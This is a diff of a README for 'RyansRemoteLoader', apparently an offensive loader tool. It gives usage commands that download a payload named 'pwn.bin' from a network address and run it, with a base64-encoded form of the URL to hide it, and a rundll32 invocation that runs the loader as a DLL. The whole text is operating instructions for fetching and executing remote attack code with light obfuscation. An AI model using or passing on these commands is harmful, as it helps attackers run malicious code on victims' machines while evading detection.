ryansisco/RyansRemoteLoader/README.md

 RRL.exe will take the remote bin file as a parameter like:
 `RRL.exe http://10.0.0.54/pwn.bin`

-RRL.exe can also take b64 encoded payloads:
-`RRL.exe -enc aHR0cDovLzEwLjAuMC41NC9wd24uYmluCg==`

-This can also be run as a DLL like the following:
+This can also be run as a DLL using a base64 encoded parameter:
 `rundll32.exe RRLDLL.dll,Driver aHR0cDovLzEwLjAuMC41NC9wd24uYmluCg==`